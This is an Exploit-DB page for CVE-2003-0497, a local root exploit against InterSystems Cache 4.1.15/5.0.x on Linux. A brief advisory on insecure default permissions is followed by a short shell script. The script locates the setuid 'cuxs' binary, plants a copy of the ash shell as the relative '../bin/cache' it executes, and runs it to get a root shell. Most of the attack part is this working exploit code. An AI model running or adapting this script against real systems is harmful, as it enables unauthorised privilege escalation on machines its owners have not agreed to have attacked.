InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions

EDB-ID:

22847

CVE:

2003-0497

EDB Verified:

Author:

Larry W. Cashdollar

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2003-07-01

Vulnerable App: 
source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services